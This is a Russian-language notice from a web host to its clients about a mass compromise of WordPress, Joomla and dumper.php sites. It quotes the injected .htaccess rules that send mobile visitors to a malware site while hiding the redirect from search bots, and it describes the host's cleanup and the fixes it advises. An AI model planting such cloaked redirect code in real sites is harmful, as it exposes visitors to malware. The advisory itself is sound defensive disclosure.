Уважаемые клиенты
В течение нескольких последних дней была произведено несколько атак, в результате которых массовому взлому подвергся ряд сайтов. Нами было расследовано порядка полутора десятка инцидентов, в разультате чего были выявлены закономерности: взлому подверглись аккаунты, на которых есть сайты, сделанные на базе Wordpress, Joomla или содержащие в открытом доступе скрипт dumper.php, часто используемый для переноса данных между различными хостингами. Не исключено, что так же взламывались сайты и на других популярных CMS.
Исходя из собранных нами следов взлома было выяснено, что взлом производился автоматически специально написанными для этого скриптами, которые запускались с серверов злоумышленников. Эти скрипты находили сайты с уязвимостями в известном им ПО и через найденные уязвимости получали контроль над аккаунтом жертвы. Было так же выяснено, что после получения контроля у взломанных аккаунтов в содержимое файлов .htaccess
добавлялся следующий код:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://m.extrasoftware.biz/?19&source=91.201.52.47 [L,R=302] # On
Код третьей строки варьировался от сайта к сайту, но во всех случаях переадресация шла на http://m.extrasoftware.biz/… Этот код делает следующее: если на сайт заходят браузером с мобильного телефона, то происходит переадресация посетителя на сайт m.extrasoftware.biz, где посетителю пытаются подсунуть вирус. Если же на сайт заходят обычным браузером с компьютера или роботом поисковой системы, то сайт работает как обычно.
Следов каких-то других зловредных действий, кроме изменения файлов .htaccess
мы не обнаружили.
Проанализировав известные нам случаи взлома мы произвели глобальный поиск измененных таким образом файлов .htaccess
и выяснили, что всего взлому подверглось по меньшей мере несколько сотен сайтов. К нам так же поступили сведения о том, что аналогичному взлому подверглись сайты, размещенные у некоторых других хостеров, в том числе и зарубежных.
Убедившись, что действия злоумышленников свелись к модификации файлов .htaccess
, мы написали и запустили по всем нашим серверам скрипт, который проделал обратные действия: нашел все измененные таким образом файлы .htaccess
по сигнатуре и удалил приведенные выше строки. Таким образом, последствия массового взлома были нами ликвидированы.
Кроме того, мы во внеплановом порядке завершили ряд технических работ по обновлению ПО наших серверов хостинга: на 5 из 8 серверов эти работы были проведены ранее, на оставшихся трех работы были проведены сегодня ночью.
Тем не менее, не смотря на проделанную нами работу следует понимать, что причина взломов - это уязвимости в ПО сайтов (joomla/wordpress) и нахождение в открытом доступе скрипта dumper.php
и эти проблемы мы решить за наших клиентов не можем. Поэтому, проделанная нами работа не является устранением уязвимостей, через которые был произведен взлом, мы устранили только последствия взлома.
dumper.php
, рекомендуем его удалить, либо переименовать, либо ограничить к нему доступ (как это делается описано в статье “Несколько простых примеров использования файла .htaccess“Пожалуйста, обратите внимание, что поскольку мы уже массово удалили вредоносное содержимое из файлов .htaccess
, отсутствие соответствующего кода в ваших файлах не означает, что ваш аккаунт не уязвим и если вы используете открытые CMS или dumper.php, проделать рекомендованные действия нужно обязательно в любом случае.
Стоит так же отметить, что это уже не первый случай массового взлома сайтов на Wordpress/Joomla за последний год. Мы сталкивались с аналогичными случаями прошедшей зимой и сняли об этом подкаст, который можно посмотреть на нашей странице на vk.com